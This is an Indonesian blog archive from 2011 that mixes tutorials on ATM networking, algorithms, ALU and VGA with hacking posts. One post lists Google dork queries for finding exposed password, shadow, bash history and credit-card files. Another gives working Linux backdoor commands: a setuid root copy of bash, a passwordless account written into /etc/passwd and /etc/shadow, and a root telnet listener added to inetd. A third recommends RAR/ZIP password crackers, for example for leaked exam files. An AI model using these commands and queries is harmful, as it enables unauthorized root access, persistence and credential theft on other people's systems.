Kamis, 29 September 2011

ASYNCHRONOUS TRANSFER MODE





ASYNCHRONOUS TRANSFER MODE (ATM) 

1988 : industri telekomunkasi mulai mengembangkan sebuah konsep yang disebut Broadband Integrated Service Digital Network- atau B-ISDN. 
B-ISDN : digambarkan sebagai carrier service (layanan pembawa) yang mampu menyediakan komunikasi ke end-user (ujung pemakai) dengan kecepatan tinggi dan dalam sistem yang tenintegrasi. 

Asynchronus Transfer Mode (.ATM) : 
Teknologi yang dipilih untuk membawa layanan B-ISDN 

PENGERTIAN UMUM 
  • ATM adalah standard ITU-T untuk relay sel di mana bermacam-macam tipe informasi, seperti : video, suara atau data dibawa dalam bentuk sel-sel berukuran kecil 
  • Sel-sel tersebut ditransfer melalui relay-relay secara asinkron. 
  • Sistim sinkronisasi diberikan hanya pada masing-masing sel 
Beberapa Keuntungan memakai ATM 
1.     ATM mampu menangani semua jenis trafik komunikasi (voice, data, image, video, suara dengan kecepatan tinggi, multimedia dan sebagainya) dalam satu saluran dan dengan kecepatan tinggi) 
2.     ATM dapat digunakan dalam Local Area Network dan Wide Area Network (WAN 
3.     Dalam pembangunan LAN, penggunaan ATM dapat menghemat biaya karena pemakai yang akan menghubungkan dirinya dengan sistern ATM LAN dapat menggunakan adapter untuk menyediakan kecepatan transmisi sesuai dengan bandwidth yang mereka butuhkan. 
KONSEP DASAR ATM 
  • ATM : suatu mode transfer yang berorientasi pada bentuk paket yang spesifik, dengan panjang tetap, berdasarkan system Asynchronous Time Division Multiplexing (ATDM), menggunakan format dengan ukuran tertentu yang disebut sel. 
  • Informasi yang terdapat di dalam sel ditransmisikan dalam jaringan setelah sebelumnya ditambahkan header di awal sel yang berfungsi sebagai routing dan kontrol sel. 
  • ATM bersifat service independence : semua service (suara, data serta gambar/citra) dapat ditransmisikan melalui ATM dengan cara penetapan beberapa tipe ATM Adaptation Layer (AAL) 
  • AAL : berfungsi mengubah format informasi yang asli ke dalam format ATM sehingga dapat ditransmisikan. 
SEL-SEL ATM 
  • Sel-sel ATM terdiri dari : 5 byte HEADER dan 48 byte INFORMASI 
  • UNI cell ATM terdiri dari : GFC, VPI, VCI, PT, CLP, HEC dan informasi 
  • NNI cell ATM terdiri dari : VPI, VCI, PT, CLP, HEC dan informasi 
  • GFC (Generic Flow Control) : digunakan untuk mengontrol aliran sel dari user-jaringan 
  • VPI (Virtual Path Identifier) : merupakan bidang routing untuk jaringan 8 bit untuk sel UNI dan 12 bit untuk sel NNI 
  • VCI (Virtual Channel Identifier) : digunakan untuk routing ke dan dari pemakai ujung 
  • PT (Payload Type) : menunjukkan jenis-jenis informasi 
  • CLP (Cell Loss Priority) : menyediakan bimbingan kepada jaringan saat terjadi kemacetan 
nilai “0” = sel dengan prioritas tinggi, tidak dapat dibuang 
nilai “1” = sel dengan prioritas rendah, dapat dibuang jika terjadi kemacetan 
  • HEC (Header Error Control) : digunakan untuk mendeteksi kesalahan. dan membetulkan kode sehingga memberikan perlindungan terhadap kesalahan dalam jaringan 
Parameter Transfer Informasi 

1. BER (Bit Error Rate) : rasio antara bit yang salah dalam informasi dengan jumlah total bit yang ditransmisikan. 
2. CLR (Cell Loss Ratio) : rasio antara jumlah sel yang hilang dengan jumlah total sel yang dikirimkan dalam interval waktu tertentu 
3. CIR (Cell Insertion Ratio) : jumlah sel yang ditransmisikan ke tujuan yang salah dengan jumlah total sel yang ditransmisikan 
4. CTD (Cell Transfer Delay) : didefinisikan sebagai waktu antara bit pertama dari sel yang meninggalkan point referensi dengan waktu dimana bit terakhir sel sampal di titik referensi kedua. 

ARSITEKTUR PROTOCOL 
  • Physical Layer : melibatkan spesifikasi media transmisi dan skema pengkodean sinyal. Kecepatan data pada Physical Layer : 25,6 MBps s/d 622,08 MBps 
  • ATM Layer : dipergunakan untuk berbagai bentuk layanan dan kemampuan transfer data (menentukan transmisi data dalam ukuran paket tertentu) 
  • ATM Adaptation Layer : memetakan informasi dari Higher layer ke dalam sel-sel ATM untuk diangkut ke seluruh jaringan dan sebaliknya mengumpulkan informasi dari sel-sel ATM untuk dikirim ke Higher Layer 
KONEKSI LOGIKA ATM 
  • Koneksi Logika ATM disebut juga Virtual Channel Connection (VCC) : Prinsipnya sama dengan Virtual Circuit pada protocol X.25 (utk komunikasi data) 
  • VCC merupakan unit dasar dari Switching dalam sebuah jaringan ATM 
  • VCC digunakan untuk pertukaran jaringan-user (untuk pensinyalan kontrol) dan jaringan-jaringan (untuk manajemen jaringan dan routing) 
  • Sekumpulan VCC membentuk ssebuah bundel yang disebut Virtual Path Connection (VPC) 
  • Prinsipnya sama dengan Virtual Circuit pada protocol X.25 (utk komunikasi data) Jika VCC digunakan untuk koneksi individu, maka VPC merupakan koneksi kelompok 
Penggunaan Virtual Channel Connection : 

1. User-User : digunakan untuk membawa data user dari ujung ke ujung 
2. User- jaringan : digunakan untuk pensinyalan kontrol user ke jaringan 
3. Jaringan-jaringan : digunakan untuk manajemen lalu lintas jaringan serta 

Fungsi-fungsi routing 

Ada 2 interface yang digunakan di dalam jaringan ATM : 
· UNI (User-Network Interface ) : interface yang menghubungkan user ke switch ATM 
· NNI (Network-Network Interface) : interface yang menghubungkan switch-switch ATM 

PERALATAN ATM 
  • Jaringan ATM terdiri dari : switch ATM dan titik ujung ATM 
  • Switch ATM bertanggung jawab untuk transit sel melalui jaringan ATM 
  • Tugas switch ATM : menerima sel dari titik ujung ATM atau switch ATM yang lain, membaca, meng-update informasi header dari sel dan men-switch ke arah tujuan. 
  • Tugas titik ujung ATM : sebagai adapter bagi jaringan ATM. Contoh : workstation, router, LAN switch, video CODEC, Digital Service Unit (DSU) 
Kelas-Kelas Pelayanan ATM 
  • Constant bit rate (CBR) : layanan untuk mendukung aplikasi yang membutuhkan kecepatan transmisi yang bisa dijamin konsistensinva sepanjang hubungan berlangsung (highly predictable transmission rate). CBR menjaga hubungan sinkronisasi antar pengguna akhir selama hubungan berlangsung. CBR ditargetkan untuk mendukung aplikasi layanan suara (telephony) yang toleransi terhadap delay jaringannya sangat ketat 
  • Variable bit Rate (VBR) : kategori layanan untuk aplikasi yang kurang sensitif terhadapvariasi kecepatan. 
  •  Variabel Bit Rate – Non Real Time (VBR-RT) : aplikasi diasumsikan mempunyai ketergantungan relatif tinggi terhadap tetapi agak longgar terhadap variasi kecepatan. Contoh : Video Conferencing 
  • Available Bit Rate (ABR) : aplikasi diasumsikan mempunyai toleransi yang lebih longgar terhadap delay jaringan sehingga tidak membutuhkan timing relationship terlalu ketat antar sisi penggunanya. Contoh : aplikasi transaksi antar Bank 
  • Unspecified Bit Rate (UBR) : Layanan UBR dirancang untuk aplikasi data yang ingin menggunakan kapasitas jaringan yang sudah tidak dipakai lagi oleh kelas layanan yang lain dan tidak sensitif terhadap cell loss atau delay. Contoh : network monitoring traffic 

ALGORITMA


Perencanaan dan perancangan program komputer juga disebut pembuatan algoritma. Secara umum, algoritma: "kumpulan urutan perintah yang menentukan operasi-operasi tertentu yang diperlukan untuk menyelesaikan suatu masalah ataupun mengerjakansuatu tugas". Bila data yang digunakan benar, maka algoritma akan selalu berhenti dengan memberikan hasil yang benar pula. Pembuatan algoritma harus selalu dikaitkan dengan : 
  • Kebenaran algoritma, yakni bila program selesai maka hasilnya juga benar.
  • Kompleksitas - lama dan jumlah - waktu proses dan penggunaan memori. 
Algoritma - dan tentu program yang baik, bercirikan :
  1. Tepat sasaran: memenuhi spesifikasi pekerjaan dan bekerja sesuai tujuan 
  2. Flexible dan portable: - Flexible untuk dikembangkan lebih lanjut - Portable untuk digunakan pada berbagai sistem dan mesin 
  3. Bersih dari kesalahan sistem ataupun lojik 
  4. Murah
  5. Didokumentasi dengan baik untuk pengoperasian, pemeliharaan dan pengembangan. 
  6. Algoritma merupakan pemberian (description) pelaksanaan suatu proses.Sebuah proses dikerjakan oleh pemroses mengikuti algoritma yang sudah dibuat. Algoritma merupakan urutan langkah instruksi yang logis. Setiap langkahinstruksi mengerjakan suatu tindakan aksi. Bila suatu aksi dilaksanakan, maka operasi atau sejumlah operasi yang bersesuaian dengan aksi itu dikerjakan oleh pemroses.
Hasil atau pengaruh suatu aksi diamati dengan membandingkan keadaan sebelum (t0) dan sesudah suatu aksi dikerjakan (t1).

             t0: kumpulan data ke 1 .. N belum terurut membesar 
             Algoritma PENGURUTAN DATA 
             t1: kumpulan data ke 1 .. N terurut membesar

Aturan Penulisan Teks Algoritma 
Tidak ada notasi yang baku dalam penulisan teks algoritma. Algoritma bukanlah program yang harus mengikuti aturan-aturan tertentu. Meski demikian, algoritma dituliskan mendekati gaya bahasa pemrograman umumnya. Misal, tulis nilai X dan Y, dituliskan dalam algoritma sebagai write(X,Y). Perhatikan dalam notasi write(X,Y) ini hanya memerintahkan penyajian nilai X ke piranti keluaran (output). Dalam notasi itu juga tidak memasalahkan format ataupun bentuk-bentuk tampilan lainnya, seperti dicetak dalam satu baris X dan Y, pemakaian pemisah antara X dan Y menggunakan koma atau spasi. Hal-hal yang bersifat teknis ini baru dipikirkan waktu penulisan program. Algoritma adalah bebas bahasa pemrograman. 

Teks Algoritma 
Mengikuti alur konsep pemrograman prosedural, suatu teks algoritma disusun dalam tiga bagian, yaitu: 
  1. Bagian kepala algoritma, 
  2. Bagian deklarasi, dan 
  3. Bagian deskripsi algoritma. 
Setiap bagian disertai dengan penjelasan atau dokumentasi tentang maksud pembuatan teks. Bagian penjelasan diawali dan diakhiri dengan simbol { dan }. 
  • Algoritma NAMA_ALGORITMA { Penjelasan tentang algoritma yang menguraikan secara singkat hal-hal yang dilakukan oleh algoritma } 
  • DEKLARASI { Semua nama yang digunakan, meliputi nama-nama: tipe, konstanta, variabel. Juga nama sub-program dinyatkan di sini } 
  • DESKRIPSI { Semua langkah atau aksi algoritma dituliskan di sini } 
Contoh: 
Kepala algoritma: Algoritma Luas_Lingkaran { Menghitung luas lingkaran dengan ukuran jejari tertentu. Algoritma menerima masukan jejari lingkaran, menghitung luasnya, dan menyajikan hasilnya ke piranti keluaran } Perhatian, dalam menulis nama-nama dalam algoritma harus mempunyai makna yang mencerminkan proses, sifat atau identitas lainnya yang melekat dengan suatu proses, tipe, konstanta, variabel, sub-program dan lain-lainnya.Nama-nama yang bermakna disebut mnemonic.

ARITHMETIC LOGIC UNIT (ALU)



Pengertian Arithmetic Logic Unic

Arithmetic Logic Unix merupakan bagian pengolah bilangan dari sebuah komputer. Di dalam operasi aritmetika ini sendiri terdiri dari berbagai macam operasi diantaranya adalah operasi penjumlahan, pengurangan, perkalian, dan pembagian. Mendesain ALU juga memiliki cara yang hampir sama dengan mendesain enkoder, dekoder, multiplexer, dan demultiplexer ALU terdiri dari register-register untuk menyimpan informasi.Operasi arithmatic dan logic terbagi dalam 4 kelas, yaitu decimal arthmatic, fixed point arithmatic, floating point arithmatic, dan logic operation.

Arithmetic Logical Unit merupakan unit penalaran secara logic. ALU ini adalah merupakan Sirkuit CPU berkecepatan tinggi yang bertugas menghitung dan membandingkan. Angka-angka dikirim dari memori ke ALU untuk dikalkulasi dan kemudian dikirim kembali ke memori. Jika CPU diasumsikan sebagai otaknya komputer, maka ada suatu alat lain di dalam CPU tersebut yang kenal dengan nama Arithmetic Logical Unit (ALU), ALU inilah yang berfikir untuk menjalankan perintah yang diberikan kepada CPU tersebut.

ALU sendiri merupakan suatu kesatuan alat yang terdiri dari berbagai komponen perangkat elektronika termasuk di dalamnya sekelompok transistor, yang dikenal dengan nama logic gate, dimana logic gate ini berfungsi untuk melaksanakan perintah dasar matematika dan operasi logika. Kumpulan susunan dari logic gate inilah yang dapat melakukan perintah perhitungan matematika yang lebih komplit seperti perintah “add” untuk menambahkan bilangan, atau “devide” atau pembagian dari suatu bilangan. Selain perintah matematika yang lebih komplit, kumpulan dari logic gate ini juga mampu untuk melaksanakan perintah yang berhubungan dengan logika, seperti hasil perbandingan dua buah bilangan. Instruksi yang dapat dilaksanakan oleh ALU disebut dengan instruction set. 

Fungsi Arithmetic Logic Unix
  • Melakukan suatu proses data yang berbentuk angka dan logika, seperti data matematika dan statistika
  • Melakukan keputusan dari operasi sesuai dengan instruksi program yaitu operasi logika (logical operation).
  • Melakukan perhitungan aritmatika (matematika) yang terjadi sesuai dengan instruksi program
  • Membantu Control Unit saat melakukan perhitungan aritmatika (ADD, SUB) dan logika (AND, OR, XOR, SHL, SHR)

Gambar fungsi ALU dalam Stuktur Dasar Sistem Komputer



Rabu, 28 September 2011

MEMBONGKAR PASSWORD RAR.






Mungkin anda pernah mendownload suatu file dan ternyata file tersebut berformat rar. atau zip.atau anda mendapatkan bocoran soal UTS dari dosen anda dan ternyata file tersebut telah diproteksi oleh sebuah password.Jangan berkecil hati mungkin software ini bisa membantu anda untuk membongkar file tersebut.
Setiap aplikasi memiliki fungsi yang berbeda-beda sesuai dengan tipe file yang didukung. Agar lebih mudah, saya akan mengelompokkannya di bawah ini.
Untuk File RAR
  1.  RAR Pass Finder, aplikasi freeware ini adalah aplikasi portable, artinya aplikasi ini dapat langsung digunakan tanpa memerlukan proses instalasi. Tampilannya cukup sederhana sehingga orang awam sekalipun dapat menggunakannya. Hanya saja, sayangnya bahasa yang digunakan pada aplikasi ini adalah bahasa Jerman. Agar lebih jelas, saya akan menjelaskan cara penggunaannya. Untuk memulai menjebol password, klik tombol Rar-Archiv atau Anda juga bisa drag dan drop file RAR yang diproteksi ke aplikasi tersebut. Menu Passwortliste digunakan untuk menambahkan data password agar proses dapat berjalan lebih efektif.
  2. RAR Password Cracker, alternatif aplikasi lain yang dapat digunakan untuk menjebol password RAR. Sayangnya aplikasi ini merupakan aplikasi shareware tetapi versi freeware-nya memungkinkan kita untuk menjebol password 2 file RAR dalam 1 waktu. Tampilannya juga cukup sederhana.

Untuk File ZIP


ZIP Password Recovery, aplikasi ini dapat digunakan untuk menjebol password ZIP. Untuk menggunakan aplikasi ini, kita harus melakukan registrasi karena bila kita tidak melakukan registrasi maka kita hanya dapat menggunakan aplikasi ini selama 60 hari.
Saya hanya menemukan 1 aplikasi untuk menjebol password ZIP karena berdasarkan pengamatan di dunia maya, hanya ini yang terbaik dan terbukti dapat menjebol password ZIP. Anda pun juga dapat men-download dan memasukkan Password Dictionaries List agar proses dapat berjalan lebih efektif. Perlu diketahui bahwa aplikasi di atas hanyalah alat bantu untuk memasukkan password perkiraan yang telah kita buat sebelumnya agar kita tidak perlu lagi mengetiknya satu persatu

PENGERTIAN VGA (VIDEO GRAPHICS ADAPTER)




VGA, singkatan dari Video Graphics Adapter, adalah standar tampilan komputer analog yang dipasarkan pertama kali oleh IBM pada tahun 1987. Walaupun standar VGA sudah tidak lagi digunakan karena sudah diganti oleh standar yang lebih baru, VGA masih diimplementasikan pada Pocket PC. VGA merupakan standar grafis terakhir yang diikuti oleh mayoritas pabrik pembuat kartu grafis komputer. Tampilan Windows sampai sekarang masih menggunakan modus VGA karena didukung oleh banyak produsen monitor dan kartu grafis.

Istilah VGA juga sering digunakan untuk mengacu kepada resolusi layar berukuran 640×480, apa pun pembuat perangkat keras kartu grafisnya. Kartu VGA berguna untuk menerjemahkan keluaran komputer ke monitor. Untuk proses desain grafis atau bermain permainan video, diperlukan kartu grafis yang berdaya tinggi. Produsen kartu grafis yang terkenal antara lain ATI dan nVidia.

Selain itu, VGA juga dapat mengacu kepada konektor VGA 15-pin yang masih digunakan secara luas untuk mengantarkan sinyal video analog ke monitor. Standar VGA secara resmi digantikan oleh standar XGA dari IBM, tetapi nyatanya VGA justru digantikan oleh Super VGA. VGA lebih populer digunakan pada mobile selular atau yang lebih dikenal hp, hardware ini sendiri dimaksudkan sebgai susunan pada adapter karena itu sebuah impletasi dari single chip (ASIC), dipasangkan dengan Motorola 6845 dan puluhan chip yang berbeda.

Selasa, 27 September 2011

TRICK MENCARI PADA GOOGLE



Pada kesempatan ini akan dipaparkan penggunaan mesin pencari informasi Google, untuk mendapatkan informasi yang tersembunyi dan sangat penting. Dimana informasi tersebut tidak terlihat melalui metode pencarian biasa. Artikel ini berdasarkan pada FAQ dan diskusi pada milis situs keamanan jaringan komputer http://bugtraq.org dan http://insecure.org tentang metode pengumpulan informasi berkaitan dengan aktifitas webhacking .
Kecenderungan penggunaan teknik ini pada awalnya digunakan untuk mendapatkan informasi sebanyak banyaknya kepada target mesin ataupun mendapatkan hak akses yang tidak wajar. Pencarian informasi secara akurat, cepat dan tepat didasari oleh berbagai macam motif dan tujuan, semoga saja paparan ini digunakan untuk tujuan mencari informasi dengan tujuan yang tidak destruktif, tetapi ialah untuk membantu pencarian informasi yang tepat, cepat dan akurat untuk tujuan yang baik dan bermanfaat.
Dibawah ini akan dijelaskan tentang perintah khusus pada Google, dan akan dijelaskan pengertian dan penggunaan dari tiap – tiap perintah untuk mendapatkan informasi tersembunyi dan sangat penting.
" Intitle:" ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan judul yang mengandung informasi pada topik yang
dimaksud. Sebagai contoh pada pencarian, “intitle:
password admin “ ( tanpa tanda kutip ). Pencarian akan mencari page yang mengandung kata “ password “ sebagai judulnya dengan prioritas utama “admin” .
Jika pada pencarian terdapat dua query pencarian utama, digunakan sintaks allintitle: untuk pencarian secara lengkap. Sebagai contoh pada pencarian “allintitle:admin mdb”. Maka pencarian akan dibatasi pada dua subjek utama judul yaitu “admin” dan “mdb”.
“ inurl:” ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan semua URL yang hanya berisi kata kunci informasi yang dimaksudkan. Sebagai contoh pencarian dalam pencarian,”inurl : database mdb”. Pencarian akan menghasilkan semua URL yang hanya mengandung informasi tentang “database mdb “.
Hal yang sama juga berlaku pada sintaks ini, jika terdapat dua query pencarian utama, digunakan sintaks “allinurl:” untuk mendapatkan list url tersebut.
Sebagai contoh pencarian “allinurl: etc/passwd“ , pencarian akan menghasilkan URL yang mengandung informasi tentang “etc” dan “passwd”. Tanda garis miring slash (“/”) diantara dua kata etc dan passwd akan diabaikan oleh mesin pencari Google.

“site:” ialah sintaks perintah untuk membatasi pencarian suatu query informasi berdasarkan pada suatu situs atau domain tertentu. Sebagai contoh pada pencarian informasi: “waveguide site:itb.ac.id” (tanpa tanda kutip). Pencarian akan mencari topic tentang waveguide pada semua halaman yang tersedia pada domain itb.ac.id.
“cache:” akan menunjukkan daftar web yang telah masuk kedalam indeks database Google. Sebagai contoh:
“cache:deffcon.org”, pencarian akan memperlihatkan list yang disimpan pada Google untuk page deffcon.org

“filetype:” ialah sintaks perintah pada Google untuk pencarian data pada internet dengan ekstensi tertentu (i.e. doc, pdf or ppt etc). Sebagai contoh pada pencarian : “filetype:doc site:go.id confidental” ( tanpa tanda kutip). Pencarian akan menghasilkan file data dengan ekstensi “.doc” pada semua domain go.id yang berisi informasi “confidential”.
“link:” ialah sintaks perintah pada Google yang akan menunjukkan daftar list webpages yang memiliki link pada webpage special. Sebagai contoh:“link:www.securityfocus.com” akan menunjuukan daftar webpage yang memiliki point link pada page SecurityFocus.
“related:” sintaks ini akan memberikan daftar web pages yang serupa dengan web page yang di indikasikan.
Sebagai contoh: “related:www.securityfocus.com”, pencarian akan memberi daftar web page yang serupa dengan homepage Securityfocus.
“intext:” sintaks perintah ini akan mencari kata kata pada website tertentu. Perintah ini mengabaikan link atau URL dan judul halaman. Sebagai contoh :
“intext:admin” (tanpa tanda petik), pencarian akan menghasilkan link pada web page yang memiliki keyword yang memiliki keyword admin.

Beberapa query sintaks diatas akan sangat membantu dalam pencarian data dan informasi lebih detail.
Google dapat menjadi mesin pencari untuk menggali informasi tertentu dan rahasia, informasi yang tidak diperkirakan yang dapat memberitahukan sisi lemah suatu sistem. Hal tersebut yang dimanfaatkan oleh sebagian individu untuk melakukan penetrasi suatu server atau sistem informasi .
Sintaks “Index of ” dapat digunakan untuk mendapatkan situs yang menampilkan indeks browsing direktori.
Webserver dengan indeks browsing yang dapat diakses, berarti siapa saja dapat melakukan akses pada direktori webserver, seperti layaknya dapat dilakukan pada lokal direktori pada umumnya.
Pada kesempatan ini dipaparkan bagaimana penggunaan sintaks “index of” untuk mendapatkan hubungan pada webserver dengan direktori indeks browsing yang dapat diakses.. Hal tersebut merupakan sumber informasi yang sederhana dapat diperoleh, akan tetapi isi dari informasi seringkali merupakan informasi yang sangat penting. Informasi tersebut dapat saja berupa password akses atau data transaksi online dan hal yang sangat penting lainnya.
Dibawah ini merupakan beberapa contoh penggunaan sintaks “ indeks of” untuk mendapatkan informasi yang penting dan sensitive sifatnya.
ex :
Index of /admin
Index of /passwd
Index of /password
Index of /mail
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
"Index of /secret"
"Index of /confidential"
"Index of /root"
"Index of /cgi-bin"
"Index of /credit-card"
"Index of /logs"
"Index of /config"
"Index of/admin.asp
"Index of/login.asp

Mencari sistem atau server yang vulnerable menggunakan sintaks “inurl:” atau “allinurl:”
1. Menggunakan sintaks “allinurl:winnt/system32/” (dengan tanda petik ) akan menampilkan daftar semua link pada server yang memberikan akses pada direktori yang terlarang seperti “system32”. Terkadang akan didapat akses pada cmd.exe pada direktori “system32” yang memungkinkan seseorang untuk mengambil alih kendali sistem pada server tersebut.

2. Menggunakan “allinurl:wwwboard/passwd.txt” ( dengan tanda petik ) akan menampilkan daftar semua link pada server yang memiliki kelemahan pada “wwwboard Password”. Pembahasan lebih lanjut tentang vulnerability “wwwboard Password” dapat dilihat pada site keamanan jaringan seperti http://www.securityfocus.com atau http://www.securitytracker.com

3. Menggunakan sintaks “inurl: bash history” (dengan tanda petik ) akan menampilkan daftar link pada server yang memberikan akses pada file “bash history” melalui web. File tersebut merupakan command history file yang mengandung daftar perintah yang dieksekusi oleh administrator, yang terkadang menyangkut informasi sensitive seperti password sistem. Seringkali password pada sistem telah dienkripsi, untuk mendapatkan password aslinya bentuk yang dienkripsi ini harus didekripsi menggunakan program password cracker. Lama waktu untuk mendapatkan hasil dekripsi tergantung dari keandalan program dan banyaknya karakter yang terenkripsi.

4. Menggunakan “inurl:config.txt” (dengan tanda petik) akan menampilkan daftar semua link pada server yang memberikan akses pada file “config.txt. File ini berisi informasi penting termasuk hash value dari password administrator dan proses autentifikasi dari suatu database.
Sintaks “inurl:” atau “allinurl:” dapat dikombinasikan dengan sintaks yang lainnya seperti pada daftar dibawah ini :
Inurl: /cgi-bin/cart32.exe
inurl:admin filetype:txt
inurl:admin filetype:db
inurl:admin filetype:cfg
inurl:mysql filetype:cfg
inurl:passwd filetype:txt
inurl:iisadmin
inurl:auth_user_file.txt
inurl:orders.txt
inurl:"wwwroot/*."
inurl:adpassword.txt
inurl:webeditor.php
inurl:file_upload.php
inurl:gov filetype:xls "restricted"
index of ftp +.mdb allinurl:/cgi-bin/ +mailto allinurl:/scripts/cart32.exe allinurl:/CuteNews/show_archives.php
allinurl:/phpinfo.php
allinurl:/privmsg.php
allinurl:/privmsg.php
inurl:cgi-bin/go.cgi?go=*
allinurl:.cgi?page=*.txt
allinurul:/modules/My_eGallery
Mencari suatu sistem atau server yang memiliki kelemahan dengan sintaks “intitle:”
atau “allintitle:”
1. Menggunakan allintitle: "index of /root” ( tanpa tanda kutip ) akan menampilkan
Daftar link pada webserver yang memberikan akses pada direktori yang terlarang seperti direktori root.

2. Menggunakan allintitle: "index of /admin” ( tanpa tanda kutip ) akan menampilkan link pada site yang memiliki indeks browsing yang dapat diakses untuk direktori terlarang seperti direktori “admin”.
Penggunaan lain dari sintaks “intitle:” atau “allintitle:” yang dikombinasikan dengan sintaks lainnya antara lain :
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
allintitle:*.php?filename=*
allintitle:*.php?page=*
allintitle:*.php?logon=*
Penggunaan dan kombinasi pada sintaks tidak hanya terbatas pada contoh paparan diatas. Masih banyak lagi kombinasi dari sintaks sintaks dengan berbagai kata kunci yang dapat digunakan. Hal tersebut bergantung pada kreativitas dan kemauan untuk mencoba. Ada baiknya penggunaan wacana yang telah dipaparkan ini digunakan untuk kepentingan yang tidak menimbulkan kerugian atau kerusakan.
Kelemahan pada suatu sistem atau server yang diketahui ada baiknya dilakukan sharing dengan administrator sistem yang bersangkutan sehingga dapat bermanfaat bagi semua pihak. Dikarenakan kemungkinan besar hasil dari pencarian informasi dapat memberikan informasi yang sensitive, yang seringkali menyangkut segi keamanan suatu sistem atau server.
Wacana tentang sintaks yang sangat membantu dalam pencarian informasi tersebut akhirnya tergantung pada niat dan tujuan dalam pencarian data. Apakah sungguh sungguh dilakukan untuk kebutuhan pencarian data, mengumpulkan informasi dari suatu mesin target penetrasi. Tujuan akhirnya bergantung pada niat individu yang bersangkutan sehingga penulis tidak bertanggung jawab terhadap penyalahgunaan dari informasi yang telah dipaparkan. Seperti kata pepatah lama “ resiko ditanggung penumpang “.

MEMBUAT BACKDOOR


Membuat backdoor memang banyak sekali tip dan triknya. Tujuan utama dari backdoor adalah supaya kita mempunyai jalan belakang menuju sasaran yang tentu saja tidak atau susah di ketahui oleh sang pemilik. Kalau diketahui oleh pemilik namanya tentu saja bukan lagi backdoor bukan ? Kini perhatikan baik-baik langkah-langkah berikut ini dan jika anda ada kritik silahkan layangkan saja kritik anda.

Local Backdoor
 cd /bin
 cp bash load
 chgrp root load
 chmod +s load

 Type load in console to get root access

User Backdoor ( Tanpa Password )
 echo test::512:512:4:/:/bin/bash >> /etc/passwd
 echo test::11092:0:99999:7:-1:-1:134537332 >>
> /etc/shadow

 Contoh:
 Red Hat Linux release 6.0 Publisher's Edition
> (Hedwig)
 Kernel 2.2.5-15smp on an i686
 login: Escuver
 [test@xes /]$

 Port Backdoor
 echo
stream tcp nowait root
> /usr/sbin/in.telnetd
 in.telnetd >> /etc/inetd.conf
 /etc/rc.d/init.d/inet restart

 Ketiga Backdoor ini dapat digunakan bersama.Pertama, telnet ke server menggunakan port backdoor
 Kemudian masukan backdoored login(username) Terakhir ketik Load.

JENIS – JENIS VIRUS



JENIS – JENIS VIRUS

Untuk lebih mempertajam pengetahuan kita tentang virus, Aku akan coba memberikan penjelasan tentang jenis-jenis virus yang sering berkeliaran di dunia cyber.

1.Virus Makro

Jenis Virus ini pasti sudah sangat sering kita dengar.Virus ini ditulis dengan bahasa pemrograman dari suatu aplikasi bukan dengan bahasa pemrograman dari suatu Operating System. Virus ini dapat berjalan apabila aplikasi pembentuknya dapat berjalan dengan baik, maksudnya jika pada komputer mac dapat menjalankan aplikasi word maka virus ini bekerja pada komputer bersistem operasi Mac. 
contoh virus: 
  • variant W97M, misal W97M.Panther panjang 1234 bytes, akanmenginfeksi NORMAL.DOT dan menginfeksi dokumen apabila dibuka. 
  • WM.Twno.A;TW panjang 41984 bytes, akan menginfeksi Dokumen Ms.Word yang menggunakan bahasa makro, biasanya berekstensi *.DOT dan *.DOC dll 
2.Virus Boot Sector

Virus Boot sector ini sudah umum sekali menyebar.Virus ini dalam menggandakan dirinya akan memindahkan atau menggantikan boot sector asli dengan program booting virus. Sehingga saat terjadi booting maka virus akan di load ke memori dan selanjutnya virus akan mempunyai kemampuan mengendalikan hardware standar 

keseluruh drive yang ada dan terhubung kekomputer (ex: floopy, drive lain (ex::monitor, printer dsb) dan dari memori ini pula virus akan menyebar selain drive c). 
contoh virus : 
  • varian virus wyx ex: wyx.C(B) menginfeksi boot record dan floopy ; panjang :520 bytes; karakteristik : memory resident dan terenkripsi) 
  • varian V-sign : menginfeksi : Master boot record ; panjang 520 bytes; karakteristik: menetap di memori (memory resident),terenkripsi, dan polymorphic) 
  • Stoned.june 4th/ bloody!: menginfeksi : Master boot record dan floopy; panjang 520 bytes; karakteristik: menetap di memori (memory resident), terenkripsi dan menampilkan pesan"Bloody!june 4th 1989" setelah komputer melakukan booting sebanyak 128 kali 
3.Stealth Virus 

Virus ini akan menguasai tabel tabel interupt pada DOS yang sering kita kenal dengan "Interrupt interceptor" virus ini berkemampuan untuk mengendalikan instruksi instruksi level DOS dan biasanya mereka tersembunyi sesuai namanya baik secara penuh ataupun ukurannya .
contoh virus: 
  • Yankee.XPEH.4928, menginfeksi file *.COM dan *.EXE ; panjang 4298 bytes; karakteristik: menetap di memori, ukurantersembunyi, memiliki pemicu 
  • WXYC (yang termasuk kategori boot record pun karena masuk kategri stealth dimasukkan pula disini), menginfeksi floopy an motherboot record; panjang 520 bytes; menetap di memori; ukuran dan virus tersembunyi. 
  • Vmem(s): menginfeksi file file *.EXE, *.SYS, dan *.COM ; panjang fie 3275 bytes; karakteristik:menetap di memori, ukuran tersembunyi, di enkripsi. 
  • dll 
4.Polymorphic Virus 

Virus ini Dirancang buat mengecoh program antivirus,artinya virus ini selalu berusaha agar tidak dikenali oleh antivirus dengan cara selalu merubah rubah strukturnya setiap kali selesai menginfeksi file/program lain. 
contoh virus: 
  • Necropolis A/B, menginfeksi file *.EXE dan *.COM; panjang file 1963 bytes; karakteristik: menetap di memori, ukuran dan virus tesembunyi,terenkripsi dan dapat berubah ubah struktur 
  • Nightfall, menginfeksi file *.EXE; panjang file 4554 bytes; karakteristik : menetap di memori, ukuran dan virus tesembunyi,memiliki pemicu, terenkripsidan dapat berubah-ubah struktur 
  • dll 
5.Virus File/Program 

Virus ini menginfeksi file file yang dapat dieksekusi langsung dari sistem operasi, baik itu file application dari virus ini dapat diketahui dengan berubahnya ukuran file yang diserangnya. (*.EXE), maupun *.COm biasanya juga hasil infeksi 

6.Multi Partition Virus 

